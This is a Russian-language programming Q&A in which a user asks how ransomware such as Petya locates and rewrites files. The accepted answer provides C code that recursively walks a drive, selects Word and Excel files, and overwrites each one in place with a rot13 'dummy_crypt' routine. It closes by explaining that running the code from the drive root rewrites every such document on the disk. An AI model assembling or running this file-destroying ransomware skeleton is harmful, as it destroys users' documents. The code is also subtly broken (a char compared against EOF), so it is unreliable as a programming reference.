# Как вирусы-вымогатели шифруют файлы?

Tags: c++, c, шифрование, вирусы

Недавно возник вопрос каким образом трояны на подобие Petya получают доступ к файлам и шифруют их?

Меня интересует именно способ нахождения и изменения содержимого файлов в файловой системе, а не методы шифрования (AES-256 и т.д.)
желательно с примерами на C/C++/ASM

Не поймите неправильно, я задаю этот вопрос только из за интереса, а гугл меня видимо забанил - не выдаёт ничего нужного)

Comment: Так какой конкретно вопрос? Как проходить по всем файлам в системе? На линуксах и mingw есть `#include <dirent.h>` и `#include <sys/stat.h>`. В винапи для этого было что-то свое.

Comment: @HolyBlackCat да я об этом, как проходить по всем файлам  на винде

Comment: На винде - это на MinGW или на WinAPI?

Comment: @HolyBlackCat я mingw использую, все таки учиться и учиться)

Answer (score 6, accepted):

Конечно, если забить в Google заголовок вашего вопроса, ничего интересного он не выдаст. Надо разбить задачу на подзадачи, точно и кратко сформулировать их суть, а потом уже спрашивать поисковик. Например, по запросам "C обход дерева каталогов" или "C walk directory tree" множество результатов с готовыми к употреблению примерами и их подробным разбором. В частности [этот пример](https://rosettacode.org/wiki/Walk_a_directory/Recursively#Library:_POSIX). Я его немного подправил для беспроблемной компиляции в MinGW:

```
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <dirent.h>
#include <pcreposix.h>
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <err.h>

enum {
    WALK_OK = 0,
    WALK_BADPATTERN,
    WALK_NAMETOOLONG,
    WALK_BADIO,
};

#if defined(_WIN64) || defined(_WIN32)
  #define S_ISLNK(X) 0
  #define lstat(path, buf) stat(path, buf)
#endif

#define WS_NONE         0
#define WS_RECURSIVE    (1 << 0)
#define WS_DEFAULT      WS_RECURSIVE
#define WS_FOLLOWLINK   (1 << 1)    /* follow symlinks */
#define WS_DOTFILES     (1 << 2)    /* per unix convention, .file is hidden */
#define WS_MATCHDIRS    (1 << 3)    /* if pattern is used on dir names too */

int walk_recur(char *dname, regex_t *reg, int spec) {
    struct dirent *dent;
    DIR *dir;
    struct stat st;
    char fn[FILENAME_MAX];
    int res = WALK_OK;
    int len = strlen(dname);
    if (len >= FILENAME_MAX - 1)
        return WALK_NAMETOOLONG;

    strcpy(fn, dname);
    fn[len++] = '/';

    if (!(dir = opendir(dname))) {
        warn("can't open %s", dname);
        return WALK_BADIO;
    }

    errno = 0;
    while ((dent = readdir(dir))) {
        if (!(spec & WS_DOTFILES) && dent->d_name[0] == '.')
            continue;
        if (!strcmp(dent->d_name, ".") || !strcmp(dent->d_name, ".."))
            continue;

        strncpy(fn + len, dent->d_name, FILENAME_MAX - len);
        if (lstat(fn, &st) == -1) {
            warn("Can't stat %s", fn);
            res = WALK_BADIO;
            continue;
        }

        /* don't follow symlink unless told so */
        if (S_ISLNK(st.st_mode) && !(spec & WS_FOLLOWLINK))
            continue;

        /* will be false for symlinked dirs */
        if (S_ISDIR(st.st_mode)) {
            /* recursively follow dirs */
            if ((spec & WS_RECURSIVE))
                walk_recur(fn, reg, spec);

            if (!(spec & WS_MATCHDIRS)) continue;
        }

        /* pattern match */
        if (!regexec(reg, fn, 0, 0, 0)) puts(fn);
    }

    if (dir) closedir(dir);
    return res ? res : errno ? WALK_BADIO : WALK_OK;
}

int walk_dir(char *dname, char *pattern, int spec) {
    regex_t r;
    int res;
    if (regcomp(&r, pattern, REG_EXTENDED | REG_NOSUB))
        return WALK_BADPATTERN;
    res = walk_recur(dname, &r, spec);
    regfree(&r);

    return res;
}

int main() {
    int r = walk_dir(".", ".\\.(docx?|xlsx?)$", WS_DEFAULT|WS_MATCHDIRS);
    switch(r) {
        case WALK_OK:           break;
        case WALK_BADIO:        err(1, "IO error");
        case WALK_BADPATTERN:   err(1, "Bad pattern");
        case WALK_NAMETOOLONG:  err(1, "Filename too long");
        default:
            err(1, "Unknown error");
    }

    return 0;
}
```

По запросам "C чтение файла" и "C запись файла" выдаёт не меньше результатов. Их можно объединить во что-нибудь вроде:

```
void dummy_crypt(char *fname) {
    FILE *fh;

    if ((fh = fopen(fname, "rb+")) == NULL)
        return;

    char c;
    while ((c = fgetc(fh)) != EOF) {
        fseek(fh, -1, SEEK_CUR);
        fputc(rot13(c), fh);
        fseek(fh, 0, SEEK_CUR);
    }

    fclose(fh);
}
```

Остаётся заменить в первом примере вызов `puts(fn)` на `dummy_crypt(fn)`, запустить в корне диска, и все документы MS Word и Excel на этом диске будут перезаписаны.